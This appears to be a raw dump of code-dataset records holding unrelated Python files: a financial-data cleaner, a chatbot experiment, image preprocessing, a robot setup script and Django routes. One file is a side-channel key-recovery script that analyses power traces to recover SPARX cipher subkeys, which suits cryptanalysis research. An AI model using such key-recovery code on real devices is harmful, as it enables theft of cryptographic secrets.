j:\r\n df_revenue[j][k] = all_row[i][9]\r\nfor a in endtime2:\r\n for b in company1:\r\n df_revenue[a][b]=float(df_revenue[a][b])\r\nfor a in endtime2:\r\n for b in company1:\r\n if df_revenue[a][b] < 1000:\r\n df_revenue[a][b] = max(df_revenue.ix[b])\r\n\r\nlb1 = []\r\nlb2 = []\r\nlb3 = []\r\nfor i in company1:\r\n lb1 = [i]\r\n lb2 = lb1*21\r\n for j in lb2:\r\n lb3.append(j)\r\nendtime3 = endtime2*6\r\ncol_1 = ['股票代码','营业收入','单季营业收入','投资收益','保险业务收入','货币现金','资产总计','交易性金融资产','保险费现金流','经营现金流','投资收益现金流']\r\ndf_timeline = pd.DataFrame(np.arange(1386).reshape((126,11)),index=endtime3, columns=col_1)\r\ndf_timeline['股票代码'] = lb3\r\nlb4 = []\r\nlb6 = []\r\nfor a in company1:\r\n lb6.append(df_revenue.ix[a])\r\n for b in df_revenue.ix[a]:\r\n lb4.append(b)\r\ndf_timeline['营业收入'] = lb4\r\n\r\nlb7 = lb6\r\nfor a in range(len(lb6)):\r\n lb7[a][0]=lb6[a][0]\r\n lb7[a][1]=lb6[a][1] - lb6[a][2]\r\n lb7[a][2]=lb6[a][2] - lb6[a][3]\r\n lb7[a][3]=lb6[a][3] - lb6[a][4]\r\n lb7[a][4]=lb6[a][4]\r\n lb7[a][5]=lb6[a][5] - lb6[a][6]\r\n lb7[a][6]=lb6[a][6] - lb6[a][7]\r\n lb7[a][7]=lb6[a][7] - lb6[a][8]\r\n lb7[a][8]=lb6[a][8]\r\n lb7[a][9]=lb6[a][9] - lb6[a][10]\r\n lb7[a][10]=lb6[a][10] - lb6[a][11]\r\n lb7[a][11]=lb6[a][11] - lb6[a][12]\r\n lb7[a][12]=lb6[a][12]\r\n lb7[a][13]=lb6[a][13] - lb6[a][14]\r\n lb7[a][14]=lb6[a][14] - lb6[a][15]\r\n lb7[a][15]=lb6[a][15] - lb6[a][16]\r\n lb7[a][16]=lb6[a][16]\r\n lb7[a][17]=lb6[a][17] - lb6[a][18]\r\n lb7[a][18]=lb6[a][18] - lb6[a][19]\r\n lb7[a][19]=lb6[a][19] - lb6[a][20]\r\n lb7[a][20]=lb6[a][20]\r\nlb8 = []\r\nfor a in range(len(lb7)):\r\n for b in lb7[a]:\r\n lb8.append(b)\r\ndf_timeline['单季营业收入'] = lb8\r\n\r\ncogs = [0.0]*126\r\nguanlifei = [0.0]*126\r\nfor i in range(len(all_row)):\r\n for j in range(len(endtime3)):\r\n if all_row[i][1] == lb3[j] and all_row[i][4] == endtime3[j]:\r\n cogs[j]=all_row[i][16]\r\n guanlifei[j]=all_row[i][11]\r\nfor a in range(len(cogs)):\r\n if cogs[a]== 0 or cogs[a]== '':\r\n cogs[a] = cogs[a-4]\r\nfor b in range(len(guanlifei)):\r\n if guanlifei[b]== 0 or guanlifei[b]== '':\r\n guanlifei[b] = guanlifei[b-4]\r\n\r\ncogs1 = cogs\r\nfor n in range(31):\r\n cogs1[4*n-3] = float(cogs[4*n-3])-float(cogs[4*n-2])\r\n cogs1[4*n-2] = float(cogs[4*n-2])-float(cogs[4*n-1])\r\n cogs1[4*n-1] = float(cogs[4*n-1])-float(cogs[4*n])\r\nguanlifei1 = guanlifei\r\nfor n in range(31):\r\n guanlifei1[4*n-3] = float(guanlifei[4*n-3])-float(guanlifei[4*n-2])\r\n guanlifei1[4*n-2] = float(guanlifei[4*n-2])-float(guanlifei[4*n-1])\r\n guanlifei1[4*n-1] = float(guanlifei[4*n-1])-float(guanlifei[4*n])\r\n \r\ndf_timeline['投资收益'] = cogs1\r\ndf_timeline['保险业务收入'] = guanlifei1\r\n\r\n########\r\n\r\nworkbook_2 = xlrd.open_workbook('Balance Sheet.xls')\r\nbooksheet_2 = workbook_2.sheet_by_index(1)\r\ncompany_2 = booksheet_2.col_values(1)\r\nall_row_2 = []\r\nfor r in range(len(company_2)):\r\n all_row_2.append(booksheet_2.row_values(r))\r\n\r\ntrad_fa = [0.0]*126\r\ncash_e = [0.0]*126\r\nclient_d = [0.0]*126\r\nfor i in range(len(all_row_2)):\r\n for j in range(len(endtime3)):\r\n if all_row_2[i][1] == lb3[j] and all_row_2[i][4] == endtime3[j]:\r\n trad_fa[j]=all_row_2[i][11]\r\n cash_e[j]=all_row_2[i][9]\r\n client_d[j]=all_row_2[i][36]\r\nfor a in range(len(trad_fa)):\r\n if trad_fa[a]== 0 or trad_fa[a]=='':\r\n trad_fa[a] = trad_fa[a-4]\r\nfor b in range(len(cash_e)):\r\n if cash_e[b]== 0 or cash_e[b]== '':\r\n cash_e[b] = cash_e[b-4]\r\nfor c in range(len(client_d)):\r\n if client_d[c]== 0 or client_d[c]== '':\r\n client_d[c] = client_d[c-4]\r\n\r\ntrad_fa1 = trad_fa\r\nfor n in range(31):\r\n trad_fa1[4*n-3] = float(trad_fa[4*n-3])-float(trad_fa[4*n-2])\r\n trad_fa1[4*n-2] = float(trad_fa[4*n-2])-float(trad_fa[4*n-1])\r\n trad_fa1[4*n-1] = float(trad_fa[4*n-1])-float(trad_fa[4*n])\r\ncash_e1 = cash_e\r\nfor n in range(31):\r\n cash_e1[4*n-3] = float(cash_e[4*n-3])-float(cash_e[4*n-2])\r\n cash_e1[4*n-2] = float(cash_e[4*n-2])-float(cash_e[4*n-1])\r\n cash_e1[4*n-1] = float(cash_e[4*n-1])-float(cash_e[4*n])\r\nclient_d1 = client_d\r\nfor n in range(31):\r\n client_d1[4*n-3] = float(client_d[4*n-3])-float(client_d[4*n-2])\r\n client_d1[4*n-2] = float(client_d[4*n-2])-float(client_d[4*n-1])\r\n client_d1[4*n-1] = float(client_d[4*n-1])-float(client_d[4*n])\r\n \r\ndf_timeline['货币现金'] = cash_e\r\ndf_timeline['资产总计'] = client_d\r\ndf_timeline['交易性金融资产'] = trad_fa\r\n\r\n#########\r\n\r\nworkbook_3 = xlrd.open_workbook('Cash Flow Statement.xls')\r\nbooksheet_3 = workbook_3.sheet_by_index(1)\r\ncompany_3 = booksheet_3.col_values(1)\r\nall_row_3 = []\r\nfor r in range(len(company_3)):\r\n all_row_3.append(booksheet_3.row_values(r))\r\n\r\ninvest = [0.0]*126\r\nyongjin = [0.0]*126\r\ncfo = [0.0]*126\r\nfor i in range(len(all_row_3)):\r\n for j in range(len(endtime3)):\r\n if all_row_3[i][1] == lb3[j] and all_row_3[i][4] == endtime3[j]:\r\n invest[j]=all_row_3[i][34]\r\n yongjin[j]=all_row_3[i][11]\r\n cfo[j]=all_row_3[i][19]\r\nfor a in range(len(invest)):\r\n if invest[a]== 0 or invest[a]=='':\r\n invest[a] = invest[a-4]\r\nfor b in range(len(yongjin)):\r\n if yongjin[b]== 0 or yongjin[b]== '':\r\n yongjin[b] = yongjin[b-4]\r\nfor c in range(len(cfo)):\r\n if cfo[c]== 0 or cfo[c]== '':\r\n cfo[c] = cfo[c-4]\r\n\r\ninvest1 = invest\r\nfor n in range(31):\r\n invest1[4*n-3] = float(invest[4*n-3])-float(invest[4*n-2])\r\n invest1[4*n-2] = float(invest[4*n-2])-float(invest[4*n-1])\r\n invest1[4*n-1] = float(invest[4*n-1])-float(invest[4*n])\r\nyongjin1 = yongjin\r\nfor n in range(31):\r\n yongjin1[4*n-3] = float(yongjin[4*n-3])-float(yongjin[4*n-2])\r\n yongjin1[4*n-2] = float(yongjin[4*n-2])-float(yongjin[4*n-1])\r\n yongjin1[4*n-1] = float(yongjin[4*n-1])-float(yongjin[4*n])\r\ncfo1 = cfo\r\nfor n in range(31):\r\n cfo1[4*n-3] = float(cfo[4*n-3])-float(cfo[4*n-2])\r\n cfo1[4*n-2] = float(cfo[4*n-2])-float(cfo[4*n-1])\r\n cfo1[4*n-1] = float(cfo[4*n-1])-float(cfo[4*n])\r\n \r\ndf_timeline['保险费现金流'] = yongjin\r\ndf_timeline['经营现金流'] = cfo\r\ndf_timeline['投资收益现金流'] = invest\r\n\r\ndf_timeline.to_csv(\"保险行业清洗数据.csv\",index=False,sep=',',encoding = 'utf-8')\r\ndf_timeline.to_excel(\"保险行业清洗数据.xlsx\",index=False)\r\n\r\nendtime5 = ['2018-03','2017-12','2017-09','2017-06','2017-03','2016-12','2016-09','2016-06','2016-03','2015-12','2015-09','2015-06','2015-03','2014-12','2014-09','2014-06','2014-03','2013-12','2013-09','2013-06','2013-03']\r\nendtime6=endtime5*6\r\ndf_rev = pd.DataFrame(np.arange(252).reshape((126,2)),index=None, columns=['time','revenue'])\r\ndf_rev['time']=endtime6\r\ndf_rev['revenue']=lb8\r\nlist_b = []\r\nlist_c=[]\r\nfor x in range(6):\r\n df_rev1 = df_rev[21*x-21:21*x].sort(columns = ['time'],axis = 0,ascending = True)\r\n list_c=[df_rev1,company1[x]]\r\n list_b.append(list_c)","sub_path":"insurance.py","file_name":"insurance.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"245925460","text":"#Ripped off from https://tfhub.dev/google/universal-sentence-encoder-large/3\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport seaborn as sns\nfrom time import time\nfrom keras.callbacks import TensorBoard\nfrom keras.layers import Input, LSTM, Embedding, Dense, Lambda, Dropout\nfrom keras.models import Model\nfrom keras import Sequential\n\nmodule_url = \"https://tfhub.dev/google/universal-sentence-encoder-large/3\" #@param [\"https://tfhub.dev/google/universal-sentence-encoder/2\", \"https://tfhub.dev/google/universal-sentence-encoder-large/3\"]\n\n# Import the Universal Sentence Encoder's TF Hub module\nembed = hub.Module(module_url)\n\n# Reduce logging output.\ntf.logging.set_verbosity(tf.logging.ERROR)\n\ndata = [\n #Smartphones\n [\"How is your phone?\", \"I like my phone\"],\n [\"My phone is not good.\", \"That why you need to buy Pixel 3!\"],\n [\"Your cellphone looks great.\", \"That is exactly what she said.\"],\n\n # Weather\n ['Would it be sunny tomorrow?', 'Yeah, it will be pretty hot tomorrow.'],\n ['Will it snow tomorrow?', 'Seems like it, there will be heavy snow storm.'],\n\n # Food and health\n [\"An apple a day, keeps the doctors away\", \"If an apple a day keeps the doctor away, how many orchards does it take for a lawyer?\"],\n [\"Eating strawberries is healthy\", \"Yeah, but that should not be all that you eat.\"],\n [\"Is paleo better than keto?\", \"Balanced diet is better.\"],\n\n # Asking about age\n [\"How old are you?\", \"I am 20 years old.\"],\n [\"what is your age?\", \"My age do not matter. It just a number.\"],\n [\"When is your birthday?\", \"Why does that matters you?\"]\n]\n\nx = []\ny = []\nfor pair in data:\n x.append(pair[0])\n y.append(pair[1])\n\n x.append(pair[1])\n y.append(pair[0])\n\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n x_embeddings = session.run(embed(x))\n y_embeddings = session.run(embed(y))\n\n print(\"x_embeddings\", x_embeddings.shape)\n\n#Training\nEMBEDDING_SIZE = 512\nprint(EMBEDDING_SIZE)\n\nmodel = Sequential([\n Dense(EMBEDDING_SIZE, activation='relu', input_shape=[EMBEDDING_SIZE]),\n Dropout(0.2),\n Dense(EMBEDDING_SIZE+round(EMBEDDING_SIZE/2), activation='relu'),\n Dropout(0.2),\n Dense(EMBEDDING_SIZE)\n ])\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.summary()\n\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n history = model.fit(x_embeddings, y_embeddings, epochs=1000, verbose=1, callbacks=[tensorboard])\n model.save_weights('./model.h5')\n\n#Prediction\np = [\n \"Will there be a thunderstorm tomorrow?\",\n \"Are you eating vegetables and fruits?\",\n \"Do you think it's worth buy thats phone?\",\n \"Should we eat protein after workout?\"\n ]\np_y = []\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n model.load_weights('./model.h5')\n p_embeddings = embed(p) \n predicts = model.predict(p_embeddings, steps=1)\n\nprint(predicts)\n\nfrom annoy import AnnoyIndex\n\nmaps = {}\nfor i in range(len(y)):\n maps[y[i]] = i\nprint(maps)\n\nt = AnnoyIndex(EMBEDDING_SIZE)\nfor i in range(len(y)):\n t.add_item(i, y_embeddings[i])\nt.build(10) # 10 trees\nt.save('test.ann')\n\nu = AnnoyIndex(EMBEDDING_SIZE)\nu.load('test.ann')\nfor i in range(len(p)):\n r = u.get_nns_by_vector(predicts[i], 1)\n print(\"Question:\", p[i], \"\\nPredicted:\", list(maps.keys())[list(maps.values()).index(r[0])], \"\\n\")","sub_path":"large-3-regression.py","file_name":"large-3-regression.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253426490","text":"#!/usr/bin/python3\n\n# An implementation of Ordinal-HD attack.\n\nimport traces\nfrom utils import *\n\nimport sys\nimport numpy\nimport scipy\nfrom collections import Counter\nimport multiprocessing\nfrom tqdm import tqdm\n\nfrom blist import blist\n\n# Global configuration.\nBYTEORDER = 'little' # Byte order for ARM-Cortex-M0.\n(alpha, beta) = (0x0011, 0x2233) # The correct key.\nN = 16 # Number of bits of operator.\nK = 4 # Chunk size.\n\n# Experiment configurations.\nNTRIAL = 200 # Number of repetitions of experiments.\nNTRACEUSE = 2000 # Number of traces to use in each trial.\n\n\ndef ModAdd(x, y, a, b, mask):\n return ((x ^ a) + (y ^ b)) & mask\n\ndef GetKey(pos, offset):\n ac = (0x2200 >> pos) % (1 << offset)\n bc = (0x2233 >> pos) % (1 << offset)\n return (ac, bc)\n\ndef TestKey(ds_sorted, pos, offset):\n (ac, bc) = GetKey(pos, offset)\n kl = [k for k in ds_sorted[0:8] if (ac, bc) == (k[0], k[1])]\n if len(kl) != 0:\n return True\n else:\n return False\n\n# Perform KSA on a chunk.\n# ts : Trace set.\n# pos : Starting position of this chunk.\n# offset : Chunk offset, i.e. size of chunk in bits.\ndef KSA(ts, pos, offset, a, b, tp = 0):\n cmask = (1 << offset) - 1 # Chunk mask\n gleakage = ts.GetPoint(tp) # Global data set\n DS = list() # Key candidates and distinguishing scores.\n \n # Enumerate over all possible keys.\n for ac in range(1 << offset):\n for bc in range(1 << offset):\n ksa_classes = [blist() for i in range(1 << offset)] # KSA classes.\n ag = a | (ac << pos)\n bg = b | (bc << pos)\n \n # Classify the traces by the target values.\n for trc in ts.GetTraces():\n # Extract (x,y) from the plaintext.\n pt = trc.udata[0:7]\n x = rotr(int.from_bytes(pt[0:2], byteorder=BYTEORDER), 7, N)\n y = int.from_bytes(pt[2:4], byteorder=BYTEORDER)\n # Compute the ARX sum in target ch\n s = ModAdd(x, y, ag, bg, (1 << 16) - 1)\n s = (s >> pos) & cmask\n # Add the leakage to corresponding class.\n ksa_classes[s].append(trc.points[tp])\n\n # Compute and sum the KS distances.\n kssum = 0\n for i in range( 1 << offset):\n ksd = scipy.stats.ks_2samp(gleakage, ksa_classes[i])[0]\n kssum += ksd\n \n DS.append((ac, bc, kssum))\n\n # Return distinguishing scores for all key guesses.\n return DS\n\n\n# Full key recovery for SPARX.\n# ts : Trace set.\ndef FullKeyRecovery(ts):\n (a, b) = (0, 0)\n\n # Iterate over each chunk.\n for i in range(0, N - 1, K - 1):\n # Perform KSA on the next trunk.\n DS = SortDim(KSA(ts, i, K, a, b), 2, True)\n if TestKey(DS, i, K):\n (ac, bc) = GetKey(i, K - 1)\n a |= ac << i\n b |= bc << i\n else:\n return (-1, -1)\n \n \n return (a, b)\n\n\n# Wrapper function for parallelisation.\n# arg : Pool.map() API argument.\ndef ParallelThreadWrapper(arg):\n (rdata) = arg\n # Recover the least significant sub keys.\n keymod = (1 << ((N - 1) - (N - 1) % (K - 1))) - 1\n if FullKeyRecovery(rdata) == (rotr(alpha, 7, N) & keymod, beta & keymod):\n return True\n else:\n return False\n\n\n# Main function.\ndef main(argc, argv):\n global alpha, beta, starttp, endtp\n\n print('#Full key KSA on SPARX.')\n fulldata = traces.LoadTraceSet(open(argv[1], 'rb'))\n\n print('#Read {} traces'.format(len(fulldata.GetTraces())))\n print('#Correct keys (rotated):({:04X},{:04X})'.format(\n rotr(alpha, 7, N), beta))\n print(\"#Using {}/{} traces\".format(NTRACEUSE, len(fulldata.GetTraces())))\n\n # Repeat the test.\n ncorrect = 0\n print(\"#NTRIAL = {}\".format(NTRIAL))\n\n if True:\n pool = multiprocessing.Pool()\n results = [None for i in range(NTRIAL)]\n\n print('#Generating random trace sets...')\n for i in tqdm(range(NTRIAL)):\n paraArgs = (fulldata.RandomSubset(NTRACEUSE))\n results[i] = pool.apply_async(ParallelThreadWrapper, (paraArgs,))\n\n print('#Performing key recovery attack...')\n for i in tqdm(range(NTRIAL)):\n if results[i].get():\n ncorrect += 1\n\n else:\n # Serial\n for i in tqdm(range(NTRIAL)):\n if ParallelThreadWrapper((fulldata.RandomSubset(NTRACEUSE))):\n ncorrect += 1\n\n # Remove the progress bar.\n sys.stdout.write(\"\\r\\033[K\\033[F\\n\")\n sys.stdout.flush()\n print('#Success rate:')\n print(\"{:0.4f}\".format(float(ncorrect) / float(NTRIAL)))\n\n return\n\n\nif __name__ == '__main__':\n main(len(sys.argv), sys.argv)\n","sub_path":"scripts/fullkeyKsa_sparx.py","file_name":"fullkeyKsa_sparx.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638731602","text":"##\r\n## /src/data/preprocessors/default_preprocessor.py\r\n##\r\n## Created by Paul Warkentin on 15/07/2018.\r\n## Updated by Paul Warkentin on 25/07/2018.\r\n##\r\n\r\nimport os\r\nimport sys\r\nimport tensorflow as tf\r\n\r\n__exec_dir = sys.path[0]\r\nwhile os.path.basename(__exec_dir) != \"src\":\r\n\t__exec_dir = os.path.dirname(__exec_dir)\r\n\tsys.path.insert(0, __exec_dir)\r\n\r\n\r\nclass DefaultPreprocessor(object):\r\n\t\"\"\"Handle the pre-processing step that decodes raw image data from the features.\r\n\r\n\tThe magic function `__call__(self, *args, **kwargs)` must be implemented in order to function as a valid pre-processing class.\r\n\t\"\"\"\r\n\r\n\tdef __init__(self):\r\n\t\t\"\"\"Initializes the class.\r\n\t\t\"\"\"\r\n\t\tsuper().__init__()\r\n\r\n\r\n\tdef __call__(self, inputs):\r\n\t\t\"\"\"Handle the pre-processing step defined in this class.\r\n\r\n\t\tThe following input features are required:\r\n\t\t\t'image/format',\r\n\t\t\t'image/encoded',\r\n\t\t\t'image/{height,width,channels}',\r\n\t\t\t'image/object/bbox/{y_min,x_min,y_max,x_max}'.\r\n\t\tThe following output features are computed within this step:\r\n\t\t\t'image',\r\n\t\t\t'image/shape',\r\n\t\t\t'image/object/bbox'.\r\n\r\n\t\tArguments:\r\n\t\t\tinputs: Dictionary containing all available input features.\r\n\r\n\t\tReturns:\r\n\t\t\tDictionary containing all input features and the new computed output features.\r\n\t\t\"\"\"\r\n\t\toutput = {}\r\n\r\n\t\t# decode image\r\n\t\timage = tf.cond(\r\n\t\t\ttf.equal(inputs[\"image/format\"], tf.constant(\"jpeg\", dtype=tf.string)),\r\n\t\t\ttrue_fn = lambda image=inputs[\"image/encoded\"]: tf.image.decode_jpeg(image, channels=3, dct_method=\"INTEGER_ACCURATE\"),\r\n\t\t\tfalse_fn = lambda image=inputs[\"image/encoded\"]: tf.image.decode_image(image, channels=3)\r\n\t\t)\r\n\t\timage.set_shape((None, None, 3))\r\n\r\n\t\t# build image shape\r\n\t\timage_shape = tf.stack([inputs[\"image/height\"], inputs[\"image/width\"], inputs[\"image/channels\"]])\r\n\r\n\t\t# build bounding boxes\r\n\t\timage_object_bbox = tf.stack([\r\n\t\t\tinputs[\"image/object/bbox/y_min\"],\r\n\t\t\tinputs[\"image/object/bbox/x_min\"],\r\n\t\t\tinputs[\"image/object/bbox/y_max\"],\r\n\t\t\tinputs[\"image/object/bbox/x_max\"]\r\n\t\t], axis=1)\r\n\r\n\t\t# change image dtype to float\r\n\t\tif image.dtype != tf.float32:\r\n\t\t\timage = tf.cast(image, tf.float32)\r\n\r\n\t\toutput[\"image\"] = image\r\n\t\toutput[\"image/shape\"] = image_shape\r\n\t\toutput[\"image/object/bbox\"] = image_object_bbox\r\n\r\n\t\treturn output\r\n","sub_path":"src/data/preprocessors/default_preprocessor.py","file_name":"default_preprocessor.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"648740490","text":"#!/usr/bin/python3\n# File name : setup.py\n# Description : RaspTank Setup Script (REVAMPED)\n# Website : www.adeept.com\n# E-mail : support@adeept.com\n# Author : Shaun Longworth\n# Date : 2019/05/30\n \nimport os\nimport time\nimport sys\n \nautostart_dir = \"/home/pi/.config/autostart\"\nautostart_file = autostart_dir + \"/car.desktop\"\ninstall_dir = \"/home/pi/Adeept_RaspTank/server\"\n \n# Commonly used functions\ndef replace_num(file,initial,new_num): \n newline=\"\"\n str_num=str(new_num)\n with open(file,\"r\") as f:\n for line in f.readlines():\n if(line.find(initial) == 0):\n line = (str_num+'\\n')\n newline += line\n with open(file,\"w\") as f:\n f.writelines(newline)\n \ndef run_os_command(cmd, max_runs=4):\n try:\n sys.stdout.write('###################################################\\n')\n sys.stdout.write('Command: ' + cmd + '\\n')\n for x in range(0,max_runs):\n if os.system(cmd) == 0:\n break\n except:\n print('AN ERROR OCCURRED RUNNING THE FOLLOWING COMMAND: ' + cmd)\n pass\n \ndef create_autostart():\n try:\n if (not os.path.exists(autostart_dir)):\n run_os_command(\"sudo mkdir '\" + autostart_dir + \"/'\", 1)\n if (not os.path.isfile(autostart_file)):\n run_os_command(\"sudo touch \" + autostart_file, 1)\n \n with open(autostart_file,'w') as file_to_write:\n file_to_write.write(\"[Desktop Entry]\\n Name=Car\\n Comment=Car\\n Exec=sudo python3 \" + install_dir + \"/server.py\\n Icon=false\\n Terminal=false\\n MutipleArgs=false\\n Type=Application\\n Catagories=Application;Development;\\n StartupNotify=true\")\n except:\n print('Autostart failed. Please try again')\n pass\n \ndef upgrade_system():\n # Upgrade the existing system\n run_os_command(\"sudo apt-get update\")\n run_os_command(\"sudo apt-get purge -y wolfram-engine\")\n run_os_command(\"sudo apt-get purge -y libreoffice*\")\n run_os_command(\"sudo apt-get -y clean\")\n run_os_command(\"sudo apt-get -y autoremove\")\n run_os_command(\"sudo apt-get -y upgrade\")\n \ndef install_car():\n # Enable the interface(s)\n try:\n replace_num(\"/boot/config.txt\",'#dtparam=i2c_arm=on','dtparam=i2c_arm=on\\nstart_x=1\\n')\n except:\n pass\n \n # Prepare to install. Clean & Update the repositories\n run_os_command(\"sudo apt-get clean\")\n run_os_command(\"sudo apt-get update\")\n \n # Install the new software\n run_os_command(\"sudo apt-get install -y i2c-tools\")\n run_os_command(\"sudo pip3 install adafruit-pca9685\")\n run_os_command(\"sudo pip3 install rpi_ws281x\")\n run_os_command(\"sudo pip3 install -U pip\")\n run_os_command(\"sudo pip3 install numpy\")\n run_os_command(\"sudo pip3 install opencv-contrib-python\")\n run_os_command(\"sudo apt-get install -y libhdf5-dev\")\n run_os_command(\"sudo apt-get install -y libhdf5-serial-dev\")\n run_os_command(\"sudo apt-get install -y build-essential pkg-config\")\n run_os_command(\"sudo apt-get install -y libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev\")\n run_os_command(\"sudo apt-get install -y libavcodec-dev libavformat-dev libswscale-dev libv4l-dev\")\n run_os_command(\"sudo apt-get install -y libgtk2.0-dev libatlas-base-dev gfortran\")\n run_os_command(\"sudo apt-get install -y libqtgui4 python3-pyqt5 libqt4-test\")\n run_os_command(\"sudo pip3 install imutils zmq pybase64 psutil\")\n \n # Create the Access Point\n run_os_command(\"git clone https://github.com/oblique/create_ap.git\")\n run_os_command(\"cd //home/pi/create_ap && sudo make install\", 1)\n \n # Download, build & Install Sphinxbase & PocketSphinx\n run_os_command(\"sudo apt-get install -y util-linux procps hostapd iproute2 iw haveged dnsmasq\")\n \n # Set up the autostart, move the config file accordingly\n create_autostart()\n run_os_command(\"sudo cp -f \" + install_dir + \"/config.txt /home/pi/config.txt\", 1)\n \ndef reboot_system():\n # Reboot the server to have the changes take effect\n run_os_command(\"sudo reboot\")\n \nwhile True:\n try:\n selection = int(input(\"Select an option:\\n 1 = Upgrade OS;\\n 2 = Install Car;\\n 3 = Reboot;\\n 4 = Exit\\n\\nOption to select: \"))\n \n if selection == 1:\n upgrade_system()\n sys.stdout.write('###################################################\\n')\n sys.stdout.write('IT IS RECOMMENDED YOU REBOOT BEFORE CONTINUING.....\\n')\n sys.stdout.write('###################################################\\n')\n elif selection == 2:\n install_car()\n elif selection == 3:\n reboot_system()\n elif selection == 4:\n break\n else:\n print(\"Invalid selection. Please try again\") \n except:\n print(\"Invalid selection. Please try again\")\n pass\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121526188","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 01:31:28 2019\n\n\"\"\"\n\nimport main_val as main\n\nimport main_m\n\n\n\"\"\"\n전 모델 공통 파라미터\n\"\"\"\n#input timestep\n\nmain.epochs = 100\nmain.batch_size = 128\nmain.isMulti = False\nmain.is_One_Station = False\nmain.One_Station = 31\nmain.isSaved = False\n#main.isweightSave = True\n\n\n\n\n# batch는 val과 train모두에게 나누어 떨어져야 함\nmain.val_dataset_raw = int(365*24)# + main.input_timestep +main.output_timestep\nmain.train_dataset_raw = int(365*24*3)# + main.input_timestep +main.output_timestep\nmain.test_dataset_raw = int(365*24)# + main.input_timestep +main.output_timestep\n#\ninput_timestep = [1,4,12,24]\nmain.input_timestep = 24\nfor main.output_timestep in input_timestep:\n main_m.run()","sub_path":"Source Code/Training Model/root_test_routine.py","file_name":"root_test_routine.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64299974","text":"from django.urls import path \nfrom . import views\n\nurlpatterns = [\n path('',views.home2, name ='home'),\n path('oxygen',views.oxygen, name ='oxygen'),\n path('consult',views.consult1, name ='consult'),\n path('consult2',views.consult2, name ='consult2'),\n path('booking11',views.booking, name ='booking'),\n path('profile',views.profile, name='profile'),\n path('edit_pro',views.edit_pro, name='edit_pro'),\n path('edit_style',views.edit_style, name='edit_style'),\n path('record',views.record1, name='record'),\n path('adminshow',views.adminshow, name='adminshowrecord')\n\n \n\n]\n","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525606190","text":"#!/usr/bin/env python3\n\nfrom argparse import ArgumentParser\nimport xml.etree.ElementTree as ET\nimport csv\nimport sys\nimport os\nimport re\nimport json\n\ng_submissions = None\n\nfrom extract_data_from_solvers_divisions import g_logics_all as g_logics_all\nfrom extract_data_from_solvers_divisions import (\n TRACK_SINGLE_QUERY_RAW,\n TRACK_INCREMENTAL_RAW,\n TRACK_UNSAT_CORE_RAW,\n TRACK_MODEL_VALIDATION_RAW,\n TRACK_PROOF_EXHIBITION_RAW,\n TRACK_PARALLEL_RAW,\n TRACK_CLOUD_RAW)\n\nTRACK_SINGLE_QUERY_REGEX='track_single_query_regex'\nTRACK_INCREMENTAL_REGEX='track_incremental_regex'\nTRACK_UNSAT_CORE_REGEX='track_unsat_core_regex'\nTRACK_MODEL_VALIDATION_REGEX='track_model_validation_regex'\nTRACK_PROOF_EXHIBITION_REGEX='track_proof_exhibition_regex'\nTRACK_PARALLEL_REGEX='track_parallel_regex'\nTRACK_CLOUD_REGEX='track_cloud_regex'\n\nclass ColumnNames:\n def __init__(self, year):\n self.colnames_base(year)\n if year >= 2022:\n self.colnames_2022()\n if year >= 2023:\n self.colnames_2023()\n\n def colnames_2023(self):\n self.SYSDESCR = 'System description URL (note that the system description is already part of the submission of the preliminary solvers).'\n\n def colnames_2022(self):\n self.STAREXEC_SOLVERID = 'StarExec ID of your preliminary solver. If you have different solver ids for several track, please provide them as \"12345,12346(uc),12347(inc)\". The tracks are single-query (sq), unsat-core (uc), incremental (inc), model-validation (mv), proof-exhibition (pe).'\n self.SINGLE_QUERY_TRACK = 'For the Single-Query Track, give a regular expression for the supported logics.'\n self.INCREMENTAL_TRACK = 'For the Incremental Track, give a regular expression for the supported logics.'\n self.MODEL_VALIDATION_TRACK = 'For the Model-Validation Track, give a regular expression for the supported logics.'\n self.UNSAT_CORE_TRACK = 'For the Unsat-Core Track, give a regular expression for the supported logics.'\n self.PROOF_EXHIBITION_TRACK = 'For the Proof-Exhibition Track, give a regular expression for the supported logics.'\n self.PARALLEL_TRACK = 'For the Parallel Track, give a regular expression for the supported logics. (You need to register for the parallel track separately)'\n self.CLOUD_TRACK = 'For the Cloud Track, give a regular expression for the supported logics. (You need to register for the cloud track separately)'\n\n def colnames_base(self, year):\n rules = \"rules\" if year >= 2021 else f\"rules{year - 2000}\"\n self.USERNAME = 'Username'\n self.SOLVER_NAME = 'Name of Solver'\n self.SOLVER_HOMEPAGE = 'Solver homepage'\n self.SYSDESCR = 'System description URL'\n self.SYSDESCR_TITLE = 'Title of the system description'\n self.STAREXEC_LINK = 'Link to StarExec solver'\n self.SINGLE_QUERY_TRACK = 'Select all divisions in the Single-Query (previously: Main) Track and the Unsat-Core Track to submit the solver to: '\n self.INCREMENTAL_TRACK = 'Select all divisions in the Incremental Track to submit the solver to:'\n self.MODEL_VALIDATION_TRACK = 'Select all 